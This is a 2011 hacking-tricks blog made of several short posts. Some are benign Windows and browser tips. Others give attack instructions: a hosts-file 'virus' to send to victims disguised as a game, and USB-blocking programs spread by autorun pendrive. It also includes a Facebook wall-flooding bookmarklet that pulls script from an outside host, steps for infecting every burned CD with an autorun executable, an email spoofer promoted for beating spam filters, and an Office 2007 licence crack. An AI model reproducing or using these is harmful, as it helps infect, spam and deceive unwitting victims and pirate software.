Thursday, September 29, 2011

Hide your files in a jpeg image using CMD

                    This is a simple command prompt ( cmd ) trick. You can hide your files behind jpeg image. You will only need winrar and a little knowledge of dos commands.
just follow these steps

step 1- create a folder and copy all files in the folder you wanted to hide in a image file.(EX- c:\hidden)
step 2- create a rar archive of these files.(EX- secret.rar)
step 3- copy a image file in the same folder. (EX: image.jpeg)
step 4- open cmd and go to the directory of the folder.(c:\hidden> )
step 5- run this command. copy /b image.jpeg+secret.rar output.jpeg

                Here image.jpeg is the image in which you want to hide you files. secret.rar is the archive of those files which you want to hide in the image. output.jpeg is name of the output image file.
                Now you can open output.jpeg by double click. It will open as a image file and will show the preview of the image. If you want to see the files hidden inside the image, open this image output.jpeg using winrar.

Send Email from any email ID | email spoofer which can cross spam filter


                  There are many email spoofing websites. You can also host your own fake email sender script too. But this one is something different. You are able to send email from any email id and that will surely be in the sender's inbox not in the spam. I got this spoofing website from hackingtricks site.

Features:

  1. Email Doesn't go in spam folder
  2. Instant delivery of emails
  3. With Attachment Support
  4. With HTML Editor
  5. And Many Other Features

                 Go and send fake mails
                  http://emkei.cz/

                
Warning: Please do not use this website for any type of cyber crimes. don't use it in illegal works.

Create a virus to block websites


                Today i am going to write a post on a simple virus written in C. It will block websites on your computer system. This C code is only the implementation of my previous post How to block a website without any software 


                I am implementing that process by a C program to create it as a virus. Once the virus is clicked, it will block the some specific websites on victim's computer. The website which you want to block is mentioned in the source code of the program. Change the list according to your choice.

          Download source code of Virus Here:
          http://www.ziddu.com/downloadlink/13612130/Virus.rar

How to use:
  • You need to have a C compiler for that.
  • Compile and build the C program and generate the EXE file.
  • Run the EXE on your computer to check it's working. 
  • Go to the browser and try to open google or facebook. ;)
  • To unblock those websites. try the procedure given in my older post How to block a website without any software and delete the new entries in the file hosts created by this virus.
  • Now send this EXE to the victim as a game or any other software.


THIS IS FOR EDUCATIONAL PURPOSE. PLEASE DO NOT USE THIS TO HARM ANYONE

How to block any website on your computer system without any software

                 There are many people who want some website unaccessible from their computer. Most of the parents want to block some websites on their computer system. Here i am going to write a well known an easy way to do this.

Steps:  
  • Go to C:\WINDOWS\system32\drivers\etc
  • Find a file named "HOSTS"
  • Open this file in notepad
  • Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , Now www.xyz.com site will no longer be accessable.

              You can add as many url of websites under this by increasing last no. of ip as
 
                   127.0.0.3 www.abcxyz.com
                   127.0.0.4 www.xyzas.com  
and so on.......
 
 

               To unblock these website only erase the line corresponding to that website.

Usb Port Hacking | block/unblock Usb ports

                   Today i am going to write about a cool hack. You can block you friends USB ports easily without even working on that system. You just need to compile these C programs. one program is for blocking USB ports and another C program is for unblocking. This trick is for windows computer because i am using registry editing for blocking and unblocking.
this pack contains

  1. block_usb_port.c  (compile this and create block.exe)
  2. unblock_usb_port.c (compile this and create unblock.exe)

Follow these steps:

  1. compile and make exe of following files.
  2. create an autorun pendrive which would run block.exe on inserting usb device.
  3. give this USB disk to any of your friend.
  4. you can directly send this exe to your friend.
         when you want to unblock usb ports run unblock.exe
 

Wednesday, September 28, 2011

10 Google tricks – Google Hacking


1.      Google trick to  search different file formats (keyword filetype:doc)
2.      Google trick to search educational resources (keyword site:.edu) example (computer site:.edu)
3.      Finding the time of any location (time romania)
4.      Finding the weather of any location (boston weather)
5.      Tracking commentary of live events (Olympic games Beijing 2008)
6.      Using Google as a calculator (9 * 10)(143+234)(119-8)
7.      Converting currencies (1 USD in INR)(10 US Dollars in Indian Rupee)
8.      Find how many teaspoons are in a quarter cup (quarter cup in teaspoons)
9.      How many seconds there are in a year (seconds in a year)
10.    Tracking stocks (stocks:MSFT)
11.    Finding faces (add imgtype=face to the URL)

How to Create your own Run Command ?????

                 I talk a lot about Windows, and using the “Run” command is a large part of it. It is a simple and easy method of accessing programs quickly. If you happen to want to make a shortcut to an application your own way, guess what, you can!

Let’s do it:
Step 1: Go to “Start,” “Run,” (told you we use it a lot) and type regedit.
Step 2: Navigate to the following:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Apps Path
Step 3: Create a new folder/key under Apps Path. (Right-Click Apps Path and click “New,” “Key.”)
Step 4: Title the new folder/key the name of the application, e.g. firefox.exe.
Step 5: Right-Click the default string value (the thing automatically created in your new folder) and click Modify.
Step 6: Change the value to the path of the executable you are attempting to run. E.g. C:\Program Files\Mozilla Firefox\firefox.exe.
Step 7: Create a new “String Value” by right-clicking under the default value (the thing we just edited) and select “New,” “String Value.” Name it Path and enter the value as the same path you previously entered.
 

 Step 8: Done! Now, all you need to do is go to “Start,” “Run,” and type the name of your command!

Edit Web Pages to Create Fake Screenshots

               How easy is it to edit any webpage on any website in your browser and create fake screenshots? Very simple and easy. Paste a simple code into the location bar and you can actually edit any page on any site in realtime. Though this sounds like fun, it can have serious implications.
               Let me start by surprising you with my million dollar Adsense earnings for today!

                 Ok so its a fake screenshot and I did not use Adobe Photoshop or any image editing software, so how did I do it? Here is the magic code spreading across the web which can edit any webpage

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

Simply copy and paste it into the location bar(Address bar) of your web browser when you are on any page and you can now edit it. Though this is a cool tool to have some fun, it is dangerous tool used by scamsters to create fake screenshots and websites resembling the original to misinterpret facts and for phishing attempts. So you need to be alert on the web and not believe everything you see…
                You don’t actually need to remember that code – To make this process faster, use the Edit Page bookmarklet (drag to your browser bookmarks toolbar, and click when needed). Try it on this page now by simply placing the cursor on any text, deleting it or editing it. These edits are not permanent and limited to your browser window only. Refresh the page and its gone. Techzilo lists many such bookmarklets to modify webpages.
                 I checked that this code works on Internet Explorer, Firefox, Opera, and Safari. Although it is easy to edit any page by altering its html code, this real time editing is amazing. Opera web browser also has a built in special feature to do this View > Source, edit in Source Editor and ‘Apply Changes’.


                   Firefox users can also try the Firebug firefox extension, a powerful tool that lets you edit, debug, and monitor CSS, HTML, and JavaScript live in any web page, and is popular among webmasters and web designers. Greasemonkey is another popular firefox extension that modifies the web and allows you to customize the way a webpage displays and functions using small bits of JavaScript.
                  You now know how easy it is to modify web content and even a kid could do it. Beware of what you see online… it could not be true!

Copy to Folder… on Every File n Folder?

          This setting allows you to assign any file on your computer a new right-click menu (context menu) entry.
          This entry is named “Copy To Folder…” which is copy current selected file/files to any folder directly from Right click menu..Settings:-

For any File:
1] Start > Run > regedit> hit Enter
2] Registry > My Computer > HKEY_CLASSES_ROOT > select * (1st subkey)
3] * > shellex > select ‘ContextMenuHandlers‘ & right click > then New > Key
4] then replace ‘New Key #1′ key name to ‘Copy To…‘ or as u wish you can write(but use as nick)
5] on right side pane, select ‘(Default)’ name n Double click on it, then brings Edit string field
6] enter value data as ‘{C2FBB630-2971-11d1-A18c-00c04FD75D13}‘ in it n hit Enter.
(Plz enter value as case sensitive with curly braces)

For any Folder:
1] Start > Run > regedit> hit Enter
2] Registry > My Computer > HKEY_CLASSES_ROOT > Folder
3] Folder > shellex > select ‘ContextMenuHandlers‘ & right click > then New > Key
4] then replace ‘New Key #1′ key name to ‘Copy To…‘ or as u wish you can write(but use as nick)
5] on right side pane, select ‘(Default)’ name n Double click on it, then brings Edit string field
6] enter value data as ‘{C2FBB630-2971-11d1-A18c-00c04FD75D13}‘ in it n hit Enter.
(Plz enter value as case sensitive with curly braces)

HOW TO MAKE AN AUTORUN CD ???????

              Have you ever noticed whenever you insert any game or software CD (consider Windows XP Operating system) it automatically runs the CD.

              If you want to make the same type of autorun CD than you have to open notepad file and write the following code in it.


                           [autorun]
                           OPEN=INSTALL\Setup_filename.EXE


               Here “Setup_filename.EXE” MUST be replaced with the name of the setup file. And also remember that it is not all of the setup files there are called “.exe” but some are called “.msi”

                Now save it as a “.inf” file not as a “.txt” file. Burn your CD with the autorun.inf file included and set the CD in your CD-drive and waits for the autorun to begin or if nothing happens just double-click on the CD drive.

Monday, September 26, 2011

FaceBook Wall Flooder Script

Hope this goes into the spam section.

Here is a javascript code that allows you to spam your friends walls or pages like lockerz wall.


Code:
javascript:(a = (b = document).createElement("script"))
.src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)
Go to your victims wall...
1. Copy and paste the following javascript into your brower's address bar.
2. A script will popup asking how many messages you want to flood. Enter an amount like 50, 100, 200...
3. Another window will popup saying what do you want to flood, type in the message.
4. Press enter and refresh the page.

Now you should the wall spammed

This currently works on Opera, Chrome, Firefox. There are some problem with internet explorer.

Tuesday, September 20, 2011

Change the Default Location of the Installing Applications in Windows

As the size of Hard Drives increase, more people are using partitions to separate and store groups of files.

XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.

1.Run the Registry Editor (regedit)and go to       
     

2.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
3. Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. 
   
Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

Anonymity - dont leave any footprints



          I can see you hiding in the shadows over there and so can the logs of all the web sites, FTP servers and other nooks and crannies you visit on the web. The sort of information gathered by these logs and which is available to the webmasters of the sites you visit include the address of the previous site you visited, your IP address, your computer's ID name, your physical location and the name of your ISP along with less personal details such as the operating system you're using and your screen resolution. If someone was snooping through your dustbin to gather information on consumer trends or tracking your every move to see where it is you go everyday you wouldn't be too chuffed would you. Well the web is no different, it's still an invasion of privacy and a threat to security and you don't have to put up with it.

Proxy servers:
       
Every time you visit a web site, detailed information about your system is automatically provided to the webmaster. This information can be used by hackers to exploit your computer or can be forwarded to the market research departments of consumer corporations who by tracking your activities on the internet are better equipped to direct more relevant spam at you. Your best defence against this is to use what is known as a proxy server, which will hide revealing information from the web sites you visit, allowing you to surf the web anonymously. These work by altering the way in which your browser retrieves web pages or connects to remote servers. With a proxy server set up, whenever you 'ask' IE or Netscape to look at a web page, the request is first sent through an external server which is completely independent of your ISP's servers. This third party server then does the requesting on your behalf so that it appears that the request came from them rather than you and your real IP address is never disclosed to the sites you visit. There is nothing to download and the whole process takes less than a minute.

        There are two different ways to use proxy servers and both have their advantages and disadvantages. The first method is to use a web based service. What this involves is visiting the proxy's home page each time you want to browse a web site anonymously. The core component of such a system is the dialog box where you enter the address of the web site you want to visit. Each time you enter the URL of the site you want to browse via the proxy into this box, your personal information, IP address and so on is first encrypted before being sent to the site allowing you to maintain your anonymity. Two of the best examples of this type of web based proxy service are Code:

  • http://www.rewebber.com/
  • http://www.anonymizer.com/.

           Obviously one disadvantage of using a web based service like Rewebber or Anonymizer, however, is that you have to visit the proxies home page each time you want to surf anonymously. You could choose to select this page as your default home page, but it's still quite awkward if you're forever site hopping at the speed of light. The second main 'con' is that you often have to put up with extra adverts on the pages you visit. These are automatically inserted into the pages by the proxy - they have to pay for service somehow. More sophisticated and convenient solutions are also on offer yet they come with a price tag.

           The second method you can use to protect your privacy via a proxy server involves adjusting the settings of your web browser so that you can surf anonymously without having to visit the home page of your proxy each time. To do this you will first need to know the name of your proxy server and the port number it uses. This information can be gleaned from either a public proxy server list or the FAQ referring to a private subscription based service. Once you have the name of the proxy server you wish to use, select 'Internet Options' from the 'Tools' menu of your browser. Now select 'Connections' followed by 'Settings' and tick the 'use a proxy server' check box. To finish the job all you have to do now is enter the name of the server in the 'address' box, the port which it uses in the 'port' box and go forth and surf anonymously.

            Free, manual proxy servers as advertised on anonymity sites, if you can find one at all, are likely to be highly oversubscribed, and as a result the speed at which they retrieve web pages can deteriorate. In which case you can go in pursuit of a public proxy server list and select an alternative from it, which can then be set up manually. To locate such a list you can investigate sites such as Code:
  • http://www.proxys4all.com/

          However, this method isn't problem free either, so before you get too carried away and go jumping on the anonymity bandwagon there are a few things you should be aware of. It's very easy to use proxies to protect your privacy, but often the disadvantages of using them far out weigh the benefits. You see, the problem is that, like the proxy servers provided Rewebber et al, free, public proxies are nearly all over subscribed and so they can slow down web browsing considerably. Digging out fast reliable proxy servers is an art form in itself and is a skill which takes considerable practice. You could find a list of public proxy servers and then experiment with each one until you find one that runs at a reasonable speed, but this can be very time consuming and frustrating. Instead, your search would be much more efficient if you got a dedicated program to carry out this task for you. There are literally dozens of proxy seeking programs around which can do just that, and many of them are available as freeware. What these do is scan the internet for public proxy servers. These servers are then tested for speed and anonymity (not all of them are truly anonymous, even if they claim to be!) and once you find one which suits your requirements you can select it as your default proxy with the click of a button.

          One of the most significant advantages of using an automated tool to locate proxy servers is that you do not have to keep editing your proxy settings manually each time you wish to try out a new one. Instead, what you do is enter 'localhost' or '127.0.0.1' into the 'address' box and '8088' into the 'port' box of your browser's proxy settings menu and then forget about it. All future proxy switching is then orchestrated from within your proxy seeking software, which subsequently relays the information to your browser or whatever type of application you are attempting to make anonymous. For those of you who are curious 'localhost' and the IP address '127.0.0.1' are the names by which every computer on the internet refers to itself.
Here's a good selection of links, which should help you to get started - Code:
  • http://www.a4proxy.com/ Anonymity 4 Proxy
  • http://www.helgasoft.com/hiproxy/ Hi Proxy
  • http://www.proxy-verifier.com/ Proxy Verifier
  • http://www.photono-software.de/ Stealther.

          You may find that even when using these programs you have difficulty finding good proxy servers. It is for this reason that many people choose only to use proxy servers temporarily whilst doing something which may land them in trouble with their ISP, or in a worst case scenario with the law. The most obvious example of a situation in which you would want to cover your tracks is when scanning for public FTP servers and subsequently uploading to them. Most other net activities are unlikely to incur serious consequences so under these circumstances you can safely surf the web without a proxy. If you're really serious about protecting your privacy, however, your best bet is probably to invest in a dedicated, stable proxy such as the ones offered by Code:
  • http://www.ultimate-anonymity.com/ Ultimate Anonymity

        These aren't free, but may be worth the expense if you aren't keen on continuously switching proxy servers.

         Before splashing out though it may be worth checking if your current ISP has a proxy server of its own which you can use. These aren't there to help you to commit cyber crimes and get away with it, they actually have a legitimate purpose as well - otherwise they wouldn't exist. You see, proxy servers were originally designed to help speed up web page loading times. Proxy servers contain a cache of all the web pages which have been requested via the browsers of the people using the proxy. When someone surfs the web using a proxy, the proxy first checks to see if it already has a copy of the web page stored in its cache. If this version of the page is bang up to date, it is sent to your computer and appears in your browser. If the page found in the cache of the proxy server is older than the one stored on the server hosting the page, a new request to the web server is made and the page is updated in the cache of the proxy before being sent to you. Because these servers use very fast internet connections they can retrieve web pages at much greater speeds than you can via your modest home setup. If these servers are located physically nearer to your home than the web host servers you wish to retrieve web pages from, the speed at which you browse the web will be accelerated.

Anonymity - Cookies
          One last important point you need to be aware of before jumping in with both feet is that different programs have to be setup in different ways before being able to make external connections via a proxy server. For example, you can surf the web anonymously by modifying the settings in Internet Explorer or Netscape Navigator as explained earlier in this tutorial, but this will only affect your browser. If you then used Flash FXP to copy a batch of 0-day releases from one FTP server to another, this isn't going to protect you in the slightest. What you have to do is enter the name of the proxy server into each application you wish to make anonymous before making any external connections. This can usually be done by browsing through the preferences of your program to see if there is a 'use proxy server' option available. If there is, make sure you use it!
Cookies:
          You have little to fear from the edible variety, but the digital ones can be a major threat to your security and privacy. A cookie is a tiny text file (usually less than 1kb in size), which is created and stored on your hard drive whenever you visit a dynamic (or an interactive if you like) web site. These are used to log your personal details so that you can access members only areas of web sites without having to type in a password every time, or to retain your customised settings so that they are available the next time you visit. If you're using a shared computer, anyone who visits the same site that you have previously logged in to can access your accounts. This is particularly worrying if you have entered your credit card details into a form on an e-commerce site. If your browser is set to automatically fill in these details whenever you
return to a previously visited site, this information could be clearly visible - you don't need me to explain the problems this could entail.

         The solution to this problem is to delete any cookies which contain sensitive data once you have completed your transactions. Your cookies will be stored in a different place depending on which operating system you are using so you will have to use your detective skills to find them. As an example, in Windows XP they are located in your 'c:\Documents and Settings\Kylie Minogue\Cookies' directory (that is if your name is Kylie Minogue. Mine isn't in case you're wondering!). If you look in this directory, in some cases it is easy to identify which cookie is associated with which web site, but in other cases it's not so obvious. The cookie which was created when you visited Yahoo.com to check your email may be called kylie minogue@yahoo.txt for example. Unfortunately some cookies refer to the IP address of the site you visited and so look more like kylie minogue@145.147.25.21. These cookies can be selectively deleted one at a time if it's obvious which ones are causing a threat to your security, or you can just wipe out the whole lot in one fell swoop and have them recreated as and when they are required. However, if
you're really struggling to find your cookie jar, you could delete your cookies via your browser's tool bar instead. In Internet Explorer this can be done through the 'Tools' > 'Internet Options' menu items.

            If all this sounds like too much hassle, you can always find a labour saving program which will be happy to take the job off your hands. These 'cookie crunching' programs allow you to be more selective when editing, viewing and deleting cookies from your system, and some of them will even prevent cookies from being created in the first place. Yes, I know you're hungry for links so I won't deprive you. Have a look here - Code:
  • http://www.rbaworld.com/Programs/CookieCruncher/ Cookie Cruncher
  • http://www.thelimitsoft.com/ Cookie Crusher
  • http://www.angove.com/ Cookie Killer
  • http://www.kburra.com/ Cookie Pal
  • http://www.cookiecentral.com/ Cookie Web Kit.

Wednesday, September 14, 2011

How to: Infect CD drive

Acctually its very easy, anyone can do this… simply u fv to follow this steps..
The default CD-Burning folder is:
========
%CurrentUser%\Local Settings\Application Data\Microsoft\CD Burning


Just copy your file to that destination,  for example:
=======
C:\Documents and Settings\[USERNAME]\Local Settings\Application Data\Microsoft\CD Burning\autorun.exe
========
Then add an autorun.inf with the following content to autorun that file in the same directory.
========== > in autorun.inf
open=autorun.exe
=========
This should be done every time your application starts to infect all written CD’s, not only the first one.
And done… now whenever u burn a CD, ur virus will also get burned in it.. have enjoy.

Thursday, June 23, 2011

Microsoft Office 2007 full version cracking

  1. Close all Microsoft Office applications.
  2. Run Register Editor by clicking on Start -> Run, and then type “regedit” in the Open box and press Enter key.
  3. Navigate to the following Registry key
  4. HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Registration
Note that inside the registry key, there should be another subkey that resembles the following:
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE
or
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Registration\{91120000-0011-0000-0000-0000000FF1CE
If there is more than one registry entries or subkeys that reference Microsoft 12.
  1. open up each subkey, and then identify the product by the ProductName value data until you locate the subkey for the product which you want to remove the existing product license key.
For example:
ProductName=Microsoft Office Professional Plus 2007
ProductName=Microsoft Office Enterprise 2007
  1. Once found the correct registry subkey, delete the following values:
DigitalProductID
ProductID
Close registry editor

Once Microsoft Office 2007 has been installed with no product key, proceed with the following steps:

In windows explorer
  1. brose to the following folder:
C:\Program Files\Common Files\Microsoft Shared\OFFICE12\Office Setup Controller\Proof.en\
  1. Right click on Proof.XML file, select “Open With…” in the right click menu.
  2. In the “Open With” window, select Notepad to be used to open the XML file. In Vista, if you can’t see the Notepad option, simply double click the “Other Programs” to unhide it.
  3. Scroll down to the bottom of the Proof.XML to locate the following lines:



  1. Change the AlwaysInsalled to neverInstalled so that the line looks like following:
  2. Save the Proof.xml file. In Windows Vista, you may need to take ownership and grant full access permission to yourself before able to modify the file.
  3. You can now launch Microsoft Office 2007 application such as Word,

As usual, as it’s a hack, and before you purchase a valid product key for it, you won’t be able to AND can’t access any updates or Microsoft Office Online.
Note: The hack may work for 60 days only. To make this hack fully working, try to delete additional file below, probably has to be deleted every two months:
C:\Documents and Settings\All Users\Application Data\Microsoft\OFFICE\DATA\opa12.dat
Or,
C:\ProgramData\Microsoft\OFFICE\DATA (for Windows 7 and Vista)